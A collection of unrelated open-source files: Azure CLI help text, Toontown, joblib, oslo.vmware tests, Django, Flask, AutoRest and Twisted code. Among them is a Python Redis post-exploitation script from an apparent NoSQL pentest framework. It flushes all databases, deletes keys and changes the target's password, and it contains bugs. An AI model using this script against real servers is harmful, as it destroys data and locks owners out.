helps['storage share metadata'] = """
type: group
short-summary: Manage the metadata of a file share.
"""
helps['storage share policy'] = """
type: group
short-summary: Manage shared access policies of a storage file share.
"""
helps['storage table'] = """
type: group
short-summary: Manage NoSQL key-value storage.
"""
helps['storage table list'] = """
type: command
short-summary: List tables in a storage account.
"""
helps['storage table policy'] = """
type: group
short-summary: Manage shared access policies of a storage table.
"""
helps['storage account network-rule'] = """
type: group
short-summary: Manage network rules.
"""
helps['storage account network-rule add'] = """
type: command
short-summary: Add a network rule.
long-summary: >
Rules can be created for an IPv4 address, address range (CIDR format), or a virtual network subnet.
examples:
- name: Create a rule to allow a specific address-range.
text: az storage account network-rule add -g myRg --account-name mystorageaccount --ip-address 23.45.1.0/24
- name: Create a rule to allow access for a subnet.
text: az storage account network-rule add -g myRg --account-name mystorageaccount --vnet myvnet --subnet mysubnet
"""
helps['storage account network-rule list'] = """
type: command
short-summary: List network rules.
"""
helps['storage account network-rule remove'] = """
type: command
short-summary: Remove a network rule.
"""
| {
"content_hash": "189e18ed49587989933b5245d65e182f",
"timestamp": "",
"source": "github",
"line_count": 584,
"max_line_length": 172,
"avg_line_length": 36.08390410958904,
"alnum_prop": 0.6585678356190385,
"repo_name": "QingChenmsft/azure-cli",
"id": "7b560c4d4ad18c0a5cc51a8a504eb8797084b008",
"size": "21419",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "src/command_modules/azure-cli-storage/azure/cli/command_modules/storage/_help.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11279"
},
{
"name": "C++",
"bytes": "275"
},
{
"name": "JavaScript",
"bytes": "380"
},
{
"name": "Python",
"bytes": "5372365"
},
{
"name": "Shell",
"bytes": "25445"
}
],
"symlink_target": ""
} |
from direct.directnotify import DirectNotifyGlobal
from toontown.parties.DistributedPartyJukeboxActivityBaseAI import DistributedPartyJukeboxActivityBaseAI
class DistributedPartyJukebox40ActivityAI(DistributedPartyJukeboxActivityBaseAI):
notify = DirectNotifyGlobal.directNotify.newCategory("DistributedPartyJukebox40ActivityAI")
| {
"content_hash": "e2b801d2deeafa9da9888df5158c6f06",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 104,
"avg_line_length": 56,
"alnum_prop": 0.9047619047619048,
"repo_name": "Spiderlover/Toontown",
"id": "d392b804b548c6ae9d6e24d1e111df3a2dd4cb57",
"size": "336",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "toontown/parties/DistributedPartyJukebox40ActivityAI.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "7774"
},
{
"name": "Python",
"bytes": "17241353"
},
{
"name": "Shell",
"bytes": "7699"
}
],
"symlink_target": ""
} |
"""Utilities for fast persistence of big data, with optional compression."""
# Author: Gael Varoquaux <gael dot varoquaux at normalesup dot org>
# Copyright (c) 2009 Gael Varoquaux
# License: BSD Style, 3 clauses.
import pickle
import io
import warnings
import contextlib
from contextlib import closing
from ._compat import PY3_OR_LATER, PY27
from .compressor import _ZFILE_PREFIX
from .compressor import _COMPRESSORS
if PY3_OR_LATER:
Unpickler = pickle._Unpickler
Pickler = pickle._Pickler
xrange = range
else:
Unpickler = pickle.Unpickler
Pickler = pickle.Pickler
try:
import numpy as np
except ImportError:
np = None
try:
# The python standard library can be built without bz2 so we make bz2
# usage optional.
# see https://github.com/scikit-learn/scikit-learn/issues/7526 for more
# details.
import bz2
except ImportError:
bz2 = None
# Buffer size used in io.BufferedReader and io.BufferedWriter
_IO_BUFFER_SIZE = 1024 ** 2
def _is_raw_file(fileobj):
"""Check if fileobj is a raw file object, e.g created with open."""
if PY3_OR_LATER:
fileobj = getattr(fileobj, 'raw', fileobj)
return isinstance(fileobj, io.FileIO)
else:
return isinstance(fileobj, file) # noqa
def _get_prefixes_max_len():
# Compute the max prefix len of registered compressors.
prefixes = [len(compressor.prefix) for compressor in _COMPRESSORS.values()]
prefixes += [len(_ZFILE_PREFIX)]
return max(prefixes)
###############################################################################
# Cache file utilities
def _detect_compressor(fileobj):
"""Return the compressor matching fileobj.
Parameters
----------
fileobj: file object
Returns
-------
str in {'zlib', 'gzip', 'bz2', 'lzma', 'xz', 'compat', 'not-compressed'}
"""
# Read the magic number in the first bytes of the file.
max_prefix_len = _get_prefixes_max_len()
if hasattr(fileobj, 'peek'):
# Peek allows to read those bytes without moving the cursor in the
# file whic.
first_bytes = fileobj.peek(max_prefix_len)
else:
# Fallback to seek if the fileobject is not peekable.
first_bytes = fileobj.read(max_prefix_len)
fileobj.seek(0)
if first_bytes.startswith(_ZFILE_PREFIX):
return "compat"
else:
for name, compressor in _COMPRESSORS.items():
if first_bytes.startswith(compressor.prefix):
return name
return "not-compressed"
def _buffered_read_file(fobj):
"""Return a buffered version of a read file object."""
if PY27 and bz2 is not None and isinstance(fobj, bz2.BZ2File):
# Python 2.7 doesn't work with BZ2File through a buffer: "no
# attribute 'readable'" error.
return fobj
else:
return io.BufferedReader(fobj, buffer_size=_IO_BUFFER_SIZE)
def _buffered_write_file(fobj):
"""Return a buffered version of a write file object."""
if PY27 and bz2 is not None and isinstance(fobj, bz2.BZ2File):
# Python 2.7 doesn't work with BZ2File through a buffer: no attribute
# 'writable'.
# BZ2File doesn't implement the file object context manager in python 2
# so we wrap the fileobj using `closing`.
return closing(fobj)
else:
return io.BufferedWriter(fobj, buffer_size=_IO_BUFFER_SIZE)
@contextlib.contextmanager
def _read_fileobject(fileobj, filename, mmap_mode=None):
"""Utility function opening the right fileobject from a filename.
The magic number is used to choose between the type of file object to open:
* regular file object (default)
* zlib file object
* gzip file object
* bz2 file object
* lzma file object (for xz and lzma compressor)
Parameters
----------
fileobj: file object
compressor: str in {'zlib', 'gzip', 'bz2', 'lzma', 'xz', 'compat',
'not-compressed'}
filename: str
filename path corresponding to the fileobj parameter.
mmap_mode: str
memory map mode that should be used to open the pickle file. This
parameter is useful to verify that the user is not trying to one with
compression. Default: None.
Returns
-------
a file like object
"""
# Detect if the fileobj contains compressed data.
compressor = _detect_compressor(fileobj)
if compressor == 'compat':
# Compatibility with old pickle mode: simply return the input
# filename "as-is" and let the compatibility function be called by the
# caller.
warnings.warn("The file '%s' has been generated with a joblib "
"version less than 0.10. "
"Please regenerate this pickle file." % filename,
DeprecationWarning, stacklevel=2)
yield filename
else:
if compressor in _COMPRESSORS:
# based on the compressor detected in the file, we open the
# correct decompressor file object, wrapped in a buffer.
compressor_wrapper = _COMPRESSORS[compressor]
inst = compressor_wrapper.decompressor_file(fileobj)
fileobj = _buffered_read_file(inst)
# Checking if incompatible load parameters with the type of file:
# mmap_mode cannot be used with compressed file or in memory buffers
# such as io.BytesIO.
if mmap_mode is not None:
if isinstance(fileobj, io.BytesIO):
warnings.warn('In memory persistence is not compatible with '
'mmap_mode "%(mmap_mode)s" flag passed. '
'mmap_mode option will be ignored.'
% locals(), stacklevel=2)
elif compressor != 'not-compressed':
warnings.warn('mmap_mode "%(mmap_mode)s" is not compatible '
'with compressed file %(filename)s. '
'"%(mmap_mode)s" flag will be ignored.'
% locals(), stacklevel=2)
elif not _is_raw_file(fileobj):
warnings.warn('"%(fileobj)r" is not a raw file, mmap_mode '
'"%(mmap_mode)s" flag will be ignored.'
% locals(), stacklevel=2)
yield fileobj
def _write_fileobject(filename, compress=("zlib", 3)):
"""Return the right compressor file object in write mode."""
compressmethod = compress[0]
compresslevel = compress[1]
if compressmethod in _COMPRESSORS.keys():
file_instance = _COMPRESSORS[compressmethod].compressor_file(
filename, compresslevel=compresslevel)
return _buffered_write_file(file_instance)
else:
file_instance = _COMPRESSORS['zlib'].compressor_file(
filename, compresslevel=compresslevel)
return _buffered_write_file(file_instance)
# Utility functions/variables from numpy required for writing arrays.
# We need at least the functions introduced in version 1.9 of numpy. Here,
# we use the ones from numpy 1.10.2.
BUFFER_SIZE = 2 ** 18 # size of buffer for reading npz files in bytes
def _read_bytes(fp, size, error_template="ran out of data"):
"""Read from file-like object until size bytes are read.
Raises ValueError if not EOF is encountered before size bytes are read.
Non-blocking objects only supported if they derive from io objects.
Required as e.g. ZipExtFile in python 2.6 can return less data than
requested.
This function was taken from numpy/lib/format.py in version 1.10.2.
Parameters
----------
fp: file-like object
size: int
error_template: str
Returns
-------
a bytes object
The data read in bytes.
"""
data = bytes()
while True:
# io files (default in python3) return None or raise on
# would-block, python2 file will truncate, probably nothing can be
# done about that. note that regular files can't be non-blocking
try:
r = fp.read(size - len(data))
data += r
if len(r) == 0 or len(data) == size:
break
except io.BlockingIOError:
pass
if len(data) != size:
msg = "EOF: reading %s, expected %d bytes got %d"
raise ValueError(msg % (error_template, size, len(data)))
else:
return data
| {
"content_hash": "92013c3c3e5dff5a9f1eb7820e09602c",
"timestamp": "",
"source": "github",
"line_count": 245,
"max_line_length": 79,
"avg_line_length": 34.43265306122449,
"alnum_prop": 0.621977240398293,
"repo_name": "vortex-ape/scikit-learn",
"id": "1ebf1aa61bb44e345a09c6ce01b8242a0aefda51",
"size": "8436",
"binary": false,
"copies": "15",
"ref": "refs/heads/master",
"path": "sklearn/externals/joblib/numpy_pickle_utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394787"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1588"
},
{
"name": "PowerShell",
"bytes": "17312"
},
{
"name": "Python",
"bytes": "6351428"
},
{
"name": "Shell",
"bytes": "8687"
}
],
"symlink_target": ""
} |
# Copyright (c) 2014 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for read and write handles for image transfer.
"""
import mock
from oslo.vmware import exceptions
from oslo.vmware import rw_handles
from oslo.vmware import vim_util
from tests import base
class FileHandleTest(base.TestCase):
"""Tests for FileHandle."""
def test_close(self):
file_handle = mock.Mock()
vmw_http_file = rw_handles.FileHandle(file_handle)
vmw_http_file.close()
file_handle.close.assert_called_once_with()
def test_del(self):
file_handle = mock.Mock()
vmw_http_file = rw_handles.FileHandle(file_handle)
del(vmw_http_file)
file_handle.close.assert_called_once_with()
def test_find_vmdk_url(self):
device_url_0 = mock.Mock()
device_url_0.disk = False
device_url_1 = mock.Mock()
device_url_1.disk = True
device_url_1.url = 'https://*/ds1/vm1.vmdk'
lease_info = mock.Mock()
lease_info.deviceUrl = [device_url_0, device_url_1]
host = '10.1.2.3'
exp_url = 'https://%s/ds1/vm1.vmdk' % host
vmw_http_file = rw_handles.FileHandle(None)
self.assertEqual(exp_url, vmw_http_file._find_vmdk_url(lease_info,
host))
class FileWriteHandleTest(base.TestCase):
"""Tests for FileWriteHandle."""
def setUp(self):
super(FileWriteHandleTest, self).setUp()
vim_cookie = mock.Mock()
vim_cookie.name = 'name'
vim_cookie.value = 'value'
self._conn = mock.Mock()
patcher = mock.patch('httplib.HTTPConnection')
self.addCleanup(patcher.stop)
HTTPConnectionMock = patcher.start()
HTTPConnectionMock.return_value = self._conn
self.vmw_http_write_file = rw_handles.FileWriteHandle(
'10.1.2.3', 'dc-0', 'ds-0', [vim_cookie], '1.vmdk', 100, 'http')
def test_write(self):
self.vmw_http_write_file.write(None)
self._conn.send.assert_called_once_with(None)
def test_close(self):
self.vmw_http_write_file.close()
self._conn.getresponse.assert_called_once_with()
self._conn.close.assert_called_once_with()
class VmdkWriteHandleTest(base.TestCase):
"""Tests for VmdkWriteHandle."""
def setUp(self):
super(VmdkWriteHandleTest, self).setUp()
self._conn = mock.Mock()
patcher = mock.patch('httplib.HTTPConnection')
self.addCleanup(patcher.stop)
HTTPConnectionMock = patcher.start()
HTTPConnectionMock.return_value = self._conn
def _create_mock_session(self, disk=True, progress=-1):
device_url = mock.Mock()
device_url.disk = disk
device_url.url = 'http://*/ds/disk1.vmdk'
lease_info = mock.Mock()
lease_info.deviceUrl = [device_url]
session = mock.Mock()
def session_invoke_api_side_effect(module, method, *args, **kwargs):
if module == session.vim:
if method == 'ImportVApp':
return mock.Mock()
elif method == 'HttpNfcLeaseProgress':
self.assertEqual(progress, kwargs['percent'])
return
return lease_info
session.invoke_api.side_effect = session_invoke_api_side_effect
vim_cookie = mock.Mock()
vim_cookie.name = 'name'
vim_cookie.value = 'value'
session.vim.client.options.transport.cookiejar = [vim_cookie]
return session
def test_init_failure(self):
session = self._create_mock_session(False)
self.assertRaises(exceptions.VimException,
lambda: rw_handles.VmdkWriteHandle(session,
'10.1.2.3',
'rp-1',
'folder-1',
None,
100))
def test_write(self):
session = self._create_mock_session()
handle = rw_handles.VmdkWriteHandle(session, '10.1.2.3',
'rp-1', 'folder-1', None,
100)
data = [1] * 10
handle.write(data)
self.assertEqual(len(data), handle._bytes_written)
self._conn.send.assert_called_once_with(data)
def test_update_progress(self):
vmdk_size = 100
data_size = 10
session = self._create_mock_session(True, 10)
handle = rw_handles.VmdkWriteHandle(session, '10.1.2.3',
'rp-1', 'folder-1', None,
vmdk_size)
handle.write([1] * data_size)
handle.update_progress()
def test_update_progress_with_error(self):
session = self._create_mock_session(True, 10)
handle = rw_handles.VmdkWriteHandle(session, '10.1.2.3',
'rp-1', 'folder-1', None,
100)
session.invoke_api.side_effect = exceptions.VimException(None)
self.assertRaises(exceptions.VimException, handle.update_progress)
def test_close(self):
session = self._create_mock_session()
handle = rw_handles.VmdkWriteHandle(session, '10.1.2.3',
'rp-1', 'folder-1', None,
100)
def session_invoke_api_side_effect(module, method, *args, **kwargs):
if module == vim_util and method == 'get_object_property':
return 'ready'
self.assertEqual(session.vim, module)
self.assertEqual('HttpNfcLeaseComplete', method)
session.invoke_api = mock.Mock(
side_effect=session_invoke_api_side_effect)
handle.close()
self.assertEqual(2, session.invoke_api.call_count)
class VmdkReadHandleTest(base.TestCase):
"""Tests for VmdkReadHandle."""
def setUp(self):
super(VmdkReadHandleTest, self).setUp()
req_patcher = mock.patch('urllib2.Request')
self.addCleanup(req_patcher.stop)
RequestMock = req_patcher.start()
RequestMock.return_value = mock.Mock()
urlopen_patcher = mock.patch('urllib2.urlopen')
self.addCleanup(urlopen_patcher.stop)
urlopen_mock = urlopen_patcher.start()
self._conn = mock.Mock()
urlopen_mock.return_value = self._conn
def _create_mock_session(self, disk=True, progress=-1):
device_url = mock.Mock()
device_url.disk = disk
device_url.url = 'http://*/ds/disk1.vmdk'
lease_info = mock.Mock()
lease_info.deviceUrl = [device_url]
session = mock.Mock()
def session_invoke_api_side_effect(module, method, *args, **kwargs):
if module == session.vim:
if method == 'ExportVm':
return mock.Mock()
elif method == 'HttpNfcLeaseProgress':
self.assertEqual(progress, kwargs['percent'])
return
return lease_info
session.invoke_api.side_effect = session_invoke_api_side_effect
vim_cookie = mock.Mock()
vim_cookie.name = 'name'
vim_cookie.value = 'value'
session.vim.client.options.transport.cookiejar = [vim_cookie]
return session
def test_init_failure(self):
session = self._create_mock_session(False)
self.assertRaises(exceptions.VimException,
lambda: rw_handles.VmdkReadHandle(session,
'10.1.2.3',
'vm-1',
'[ds] disk1.vmdk',
100))
def test_read(self):
chunk_size = rw_handles.READ_CHUNKSIZE
session = self._create_mock_session()
self._conn.read.return_value = [1] * chunk_size
handle = rw_handles.VmdkReadHandle(session, '10.1.2.3',
'vm-1', '[ds] disk1.vmdk',
chunk_size * 10)
handle.read(chunk_size)
self.assertEqual(chunk_size, handle._bytes_read)
self._conn.read.assert_called_once_with(chunk_size)
def test_update_progress(self):
chunk_size = rw_handles.READ_CHUNKSIZE
vmdk_size = chunk_size * 10
session = self._create_mock_session(True, 10)
self._conn.read.return_value = [1] * chunk_size
handle = rw_handles.VmdkReadHandle(session, '10.1.2.3',
'vm-1', '[ds] disk1.vmdk',
vmdk_size)
handle.read(chunk_size)
handle.update_progress()
def test_update_progress_with_error(self):
session = self._create_mock_session(True, 10)
handle = rw_handles.VmdkReadHandle(session, '10.1.2.3',
'vm-1', '[ds] disk1.vmdk',
100)
session.invoke_api.side_effect = exceptions.VimException(None)
self.assertRaises(exceptions.VimException, handle.update_progress)
def test_close(self):
session = self._create_mock_session()
handle = rw_handles.VmdkReadHandle(session, '10.1.2.3',
'vm-1', '[ds] disk1.vmdk',
100)
def session_invoke_api_side_effect(module, method, *args, **kwargs):
if module == vim_util and method == 'get_object_property':
return 'ready'
self.assertEqual(session.vim, module)
self.assertEqual('HttpNfcLeaseComplete', method)
session.invoke_api = mock.Mock(
side_effect=session_invoke_api_side_effect)
handle.close()
self.assertEqual(2, session.invoke_api.call_count)
class ImageReadHandleTest(base.TestCase):
"""Tests for ImageReadHandle."""
def test_read(self):
max_items = 10
item = [1] * 10
class ImageReadIterator:
def __init__(self):
self.num_items = 0
def __iter__(self):
return self
def next(self):
if (self.num_items < max_items):
self.num_items += 1
return item
raise StopIteration
handle = rw_handles.ImageReadHandle(ImageReadIterator())
for _ in range(0, max_items):
self.assertEqual(item, handle.read(10))
self.assertFalse(handle.read(10))
| {
"content_hash": "8e61045ba7259ed1d2b011febc02b0ab",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 78,
"avg_line_length": 38.29666666666667,
"alnum_prop": 0.5434763687004961,
"repo_name": "citrix-openstack-build/oslo.vmware",
"id": "a27f70dcb9c68fb9e84ff924554042cf5198d159",
"size": "11489",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_rw_handles.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "203261"
}
],
"symlink_target": ""
} |
"""web URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
import blog
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^',include('blog.urls')),
]
| {
"content_hash": "35d366c1b4e8fa7d2f68c731ca788efa",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 79,
"avg_line_length": 37,
"alnum_prop": 0.6953316953316954,
"repo_name": "SnailTowardThesun/blog_django",
"id": "2990a15e263f8e733efd9cfecd2973079c3b8118",
"size": "814",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/web/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "62899"
},
{
"name": "HTML",
"bytes": "27970"
},
{
"name": "JavaScript",
"bytes": "96031"
},
{
"name": "Python",
"bytes": "9303"
}
],
"symlink_target": ""
} |
from flask import render_template, request
from standup.utils import json_requested, jsonify
def register_error_handlers(app):
app.register_error_handler(403, forbidden)
app.register_error_handler(404, page_not_found)
app.register_error_handler(500, something_broke)
def api_error(code, message):
error = dict(request=request.path, message=message)
return jsonify(error), code
def error(code, message, template):
if json_requested():
return api_error(code, str(message))
else:
return render_template(template, error=message), code
def forbidden(message=None):
message = message or 'You shall not pass!'
return error(403, message, 'errors/403.html')
def page_not_found(message=None):
message = message or 'Oops! The page you are looking for does not exist.'
return error(404, message, 'errors/404.html')
def something_broke(message=None):
message = message or 'Oops! Stood up too fast and feeling woozy.'
return error(500, message, 'errors/500.html')
class ApiError(Exception):
def __init__(self, *args, **kwargs):
super(ApiError, self).__init__(*args)
self.code = kwargs.pop('code', 400)
| {
"content_hash": "d92d267e45ecbbec148b97af17b76508",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 77,
"avg_line_length": 28.357142857142858,
"alnum_prop": 0.6943744752308985,
"repo_name": "rlr/standup",
"id": "97c1cf5ca07a2f21dfaf5dcf2f69c05d1ad1eb87",
"size": "1191",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "standup/errors.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "33470"
},
{
"name": "JavaScript",
"bytes": "2960"
},
{
"name": "Python",
"bytes": "149693"
},
{
"name": "Shell",
"bytes": "427"
}
],
"symlink_target": ""
} |
import sys
from redisattacks import redis_conn,redis_enum
from couchattacks import couch_conn
from termcolor import colored
#def post_couch():
def post_redis():
target=raw_input("Enter target\n")
r_server=redis_conn(target,6379)
try:
shit=r_server.keys()
except:
print colored("[+] Authentication Required \n",'red')
print colored("[+] Enter DB password to perform post attacks \n",'blue')
password=raw_input()
try:
r_server.execute_command('AUTH',password)
except Exception,e:
print colored("[+] "+str(e),'red')
sys.exit(0)
print colored("[+] Perform Post Exploitation Redis Operations \n",'green')
print colored("[+] 1)List Keys & Clients Connected \n[+] 2)Add Key \n[+] 3)Delete Keys or Flush Entire DB \n[+] 4)Change Password \n[+] 5)Execute Client commands \n",'green')
choice=input()
if choice == 1:
print colored("[+] Clients Connected %s "%(r_server.client_list()[0]['addr']))
redis_enum(r_server)
elif choice==2:
print colored("[-] Enter Key name and data",'yellow')
key=raw_input("Key\n")
data=raw_input("Data \n")
try:
r_server.set(key, data)
print colored("[-] %s:%s added"%(key,data),'blue')
except:
print colored("Error occured",'red')
elif choice == 3:
print colored("[+] a)Flush DB \n[+] b)Delete Key \n[-] Enter choice (a/b)",'blue')
ch = raw_input()
if ch == 'b':
print colored("[+] Enter the Key value to delete \n",'yellow')
key=raw_input()
if r_server.delete(key) == 1:
print colored("[+] Key %s deleted \n"%(key),'blue')
else:
print colored("[+] Key %s Doesnt Exist \n"%(key),'red')
else:
print "[+] Flushed All Database Keys \n"
r_server.flushall()
elif choice ==4:
print colored("[-] Current Password %s \n"%(r_server.config_get()['requirepass']),'green')
print colored("[+] Enter new password \n",'green')
password=raw_input()
r_server.config_set('requirepass',password)
print colored("Password Successfully set to %s"%(r_server.config_get()['requirepass']),'green')
elif choice == 4:
print colored("Execute client Commands\n eg:FLUSHDB,ECHO,AUTH,",'blue')
r_server.execute_command(command)
post_redis()
| {
"content_hash": "12ffc79261fec1acf747b20e67041462",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 175,
"avg_line_length": 36.355932203389834,
"alnum_prop": 0.6564102564102564,
"repo_name": "ajinabraham/Nosql-Exploitation-Framework",
"id": "976ba1f68e7e55a79a69c4354f0a9bde3db88a18",
"size": "2187",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dbattacks/postattacks.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "78243"
},
{
"name": "Shell",
"bytes": "384"
}
],
"symlink_target": ""
} |
from msrest.exceptions import (
ClientException,
SerializationError,
DeserializationError,
TokenExpiredError,
ClientRequestError,
AuthenticationError,
HttpOperationError,
)
from .api_client import AutoRestLongRunningOperationTestService, AutoRestLongRunningOperationTestServiceConfiguration
__all__ = [
'ClientException',
'SerializationError',
'DeserializationError',
'TokenExpiredError',
'ClientRequestError',
'AuthenticationError',
'HttpOperationError',
'AutoRestLongRunningOperationTestService',
'AutoRestLongRunningOperationTestServiceConfiguration'
]
| {
"content_hash": "ace0796cb775a2ae05955f1fbff08f95",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 117,
"avg_line_length": 27.043478260869566,
"alnum_prop": 0.7717041800643086,
"repo_name": "vulcansteel/autorest",
"id": "ea1145bcb5d0b5cfa7dab0f0dc81a233fd6aab4f",
"size": "1096",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "AutoRest/Generators/Python/Azure.Python.Tests/Expected/AcceptanceTests/Lro/auto_rest_long_running_operation_test_service/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "819"
},
{
"name": "C#",
"bytes": "8857811"
},
{
"name": "CSS",
"bytes": "110"
},
{
"name": "HTML",
"bytes": "274"
},
{
"name": "Java",
"bytes": "3171512"
},
{
"name": "JavaScript",
"bytes": "4063363"
},
{
"name": "PowerShell",
"bytes": "8003"
},
{
"name": "Puppet",
"bytes": "145"
},
{
"name": "Python",
"bytes": "1831874"
},
{
"name": "Ruby",
"bytes": "218212"
},
{
"name": "TypeScript",
"bytes": "158339"
}
],
"symlink_target": ""
} |
"""
Time zone utilities.
"""
from datetime import datetime, timedelta, tzinfo
__all__ = [
"FixedOffsetTimeZone",
"UTC",
]
class FixedOffsetTimeZone(tzinfo):
"""
Represents a fixed timezone offset (without daylight saving time).
@ivar name: A L{str} giving the name of this timezone; the name just
includes how much time this offset represents.
@ivar offset: A L{timedelta} giving the amount of time this timezone is
offset.
"""
def __init__(self, offset, name=None):
"""
Construct a L{FixedOffsetTimeZone} with a fixed offset.
@param offset: a delta representing the offset from UTC.
@type offset: L{timedelta}
@param name: A name to be given for this timezone.
@type name: L{str} or L{NoneType}
"""
self.offset = offset
self.name = name
@classmethod
def fromSignHoursMinutes(cls, sign, hours, minutes):
"""
Construct a L{FixedOffsetTimeZone} from an offset described by sign
('+' or '-'), hours, and minutes.
@note: For protocol compatibility with AMP, this method never uses 'Z'
@param sign: A string describing the positive or negative-ness of the
offset.
@param hours: The number of hours in the offset.
@type hours: L{int}
@param minutes: The number of minutes in the offset
@type minutes: L{int}
@return: A time zone with the given offset, and a name describing the
offset.
@rtype: L{FixedOffsetTimeZone}
"""
name = "%s%02i:%02i" % (sign, hours, minutes)
if sign == "-":
hours = -hours
minutes = -minutes
elif sign != "+":
raise ValueError("Invalid sign for timezone %r" % (sign,))
return cls(timedelta(hours=hours, minutes=minutes), name)
@classmethod
def fromLocalTimeStamp(cls, timeStamp):
"""
Create a time zone with a fixed offset corresponding to a time stamp in
the system's locally configured time zone.
@param timeStamp: a time stamp
@type timeStamp: L{int}
@return: a time zone
@rtype: L{FixedOffsetTimeZone}
"""
offset = (
datetime.fromtimestamp(timeStamp) -
datetime.utcfromtimestamp(timeStamp)
)
return cls(offset)
def utcoffset(self, dt):
"""
Return this timezone's offset from UTC.
"""
return self.offset
def dst(self, dt):
"""
Return a zero C{datetime.timedelta} for the daylight saving time
offset, since there is never one.
"""
return timedelta(0)
def tzname(self, dt):
"""
Return a string describing this timezone.
"""
if self.name is not None:
return self.name
# XXX this is wrong; the tests are
dt = datetime.fromtimestamp(0, self)
return dt.strftime("UTC%z")
UTC = FixedOffsetTimeZone.fromSignHoursMinutes("+", 0, 0)
| {
"content_hash": "35bbf76c441d9c2822f3658ce58cf453",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 79,
"avg_line_length": 26.63478260869565,
"alnum_prop": 0.5902709761671564,
"repo_name": "mollstam/UnrealPy",
"id": "614f62bf6b170623abe36b4cdbc3cb11dac5f34b",
"size": "3196",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Twisted-15.2.1/twisted/python/_tzhelper.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "APL",
"bytes": "587"
},
{
"name": "ASP",
"bytes": "2753"
},
{
"name": "ActionScript",
"bytes": "5686"
},
{
"name": "Ada",
"bytes": "94225"
},
{
"name": "Agda",
"bytes": "3154"
},
{
"name": "Alloy",
"bytes": "6579"
},
{
"name": "ApacheConf",
"bytes": "12482"
},
{
"name": "AppleScript",
"bytes": "421"
},
{
"name": "Assembly",
"bytes": "1093261"
},
{
"name": "AutoHotkey",
"bytes": "3733"
},
{
"name": "AutoIt",
"bytes": "667"
},
{
"name": "Awk",
"bytes": "63276"
},
{
"name": "Batchfile",
"bytes": "147828"
},
{
"name": "BlitzBasic",
"bytes": "185102"
},
{
"name": "BlitzMax",
"bytes": "2387"
},
{
"name": "Boo",
"bytes": "1111"
},
{
"name": "Bro",
"bytes": "7337"
},
{
"name": "C",
"bytes": "108397183"
},
{
"name": "C#",
"bytes": "156749"
},
{
"name": "C++",
"bytes": "13535833"
},
{
"name": "CLIPS",
"bytes": "6933"
},
{
"name": "CMake",
"bytes": "12441"
},
{
"name": "COBOL",
"bytes": "114812"
},
{
"name": "CSS",
"bytes": "430375"
},
{
"name": "Ceylon",
"bytes": "1387"
},
{
"name": "Chapel",
"bytes": "4366"
},
{
"name": "Cirru",
"bytes": "2574"
},
{
"name": "Clean",
"bytes": "9679"
},
{
"name": "Clojure",
"bytes": "23871"
},
{
"name": "CoffeeScript",
"bytes": "20149"
},
{
"name": "ColdFusion",
"bytes": "9006"
},
{
"name": "Common Lisp",
"bytes": "49017"
},
{
"name": "Coq",
"bytes": "66"
},
{
"name": "Cucumber",
"bytes": "390"
},
{
"name": "Cuda",
"bytes": "776"
},
{
"name": "D",
"bytes": "7556"
},
{
"name": "DIGITAL Command Language",
"bytes": "425938"
},
{
"name": "DTrace",
"bytes": "6706"
},
{
"name": "Dart",
"bytes": "591"
},
{
"name": "Dylan",
"bytes": "6343"
},
{
"name": "Ecl",
"bytes": "2599"
},
{
"name": "Eiffel",
"bytes": "2145"
},
{
"name": "Elixir",
"bytes": "4340"
},
{
"name": "Emacs Lisp",
"bytes": "18303"
},
{
"name": "Erlang",
"bytes": "5746"
},
{
"name": "F#",
"bytes": "19156"
},
{
"name": "FORTRAN",
"bytes": "38458"
},
{
"name": "Factor",
"bytes": "10194"
},
{
"name": "Fancy",
"bytes": "2581"
},
{
"name": "Fantom",
"bytes": "25331"
},
{
"name": "GAP",
"bytes": "29880"
},
